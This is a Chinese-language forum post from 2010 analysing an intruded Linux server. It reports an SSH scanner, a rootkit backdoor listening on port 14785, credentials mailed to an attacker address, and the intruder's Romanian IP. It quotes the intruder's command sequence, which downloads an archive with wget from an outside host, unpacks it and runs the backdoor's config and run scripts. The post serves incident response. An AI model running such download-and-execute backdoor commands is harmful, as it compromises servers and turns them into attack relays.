查看: 11005|回复: 0
打印 上一主题 下一主题

分析一台被入侵的linux服务器

[复制链接]
跳转到指定楼层
1#
发表于 2010-10-20 11:12:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
台州网址导航
客户反映一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下

  黑客进入服务器后所做的操作:

  1.       向/var/tmp/下上传了两个恶意程序

  其中wtf为向外扫描其它服务器的ssh-scan黑客软件,.access.log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo.com这个邮箱。

  2.       入侵者登陆记录

  85.120.78.140的IP来自罗马尼亚。

  3.       wget ; tar zxvf wtf.jpg

  wget adelinuangell.lx.ro/ryo.tar

  tar xvf ryo.tar

  cd .access.log

  ./config Ady 14785

  ./run

  结束进程。删掉程序。。删掉用户。修改root密码。
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 转播转播 分享分享 分享淘帖
台州维博网络(www.tzweb.com)专门运用PHP+MYSQL/ASP.NET+MSSQL技术开发网站门户平台系统等。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

网站推广
关于我们
  • 台州朗动科技(Tzweb.com)拥有多年开发网站平台系统门户手机客户端等业务的成功经验。主要从事:政企网站,系统平台,微信公众号,各类小程序,手机APP客户端,浙里办微应用,浙政钉微应用、主机域名、虚拟空间、后期维护等服务,满足不同企业公司的需求,是台州地区领先的网络技术服务商!

Hi,扫描关注我

Copyright © 2005-2025 站长论坛 All rights reserved

Powered by 站长论坛 with TZWEB Update Techonolgy Support

快速回复 返回顶部 返回列表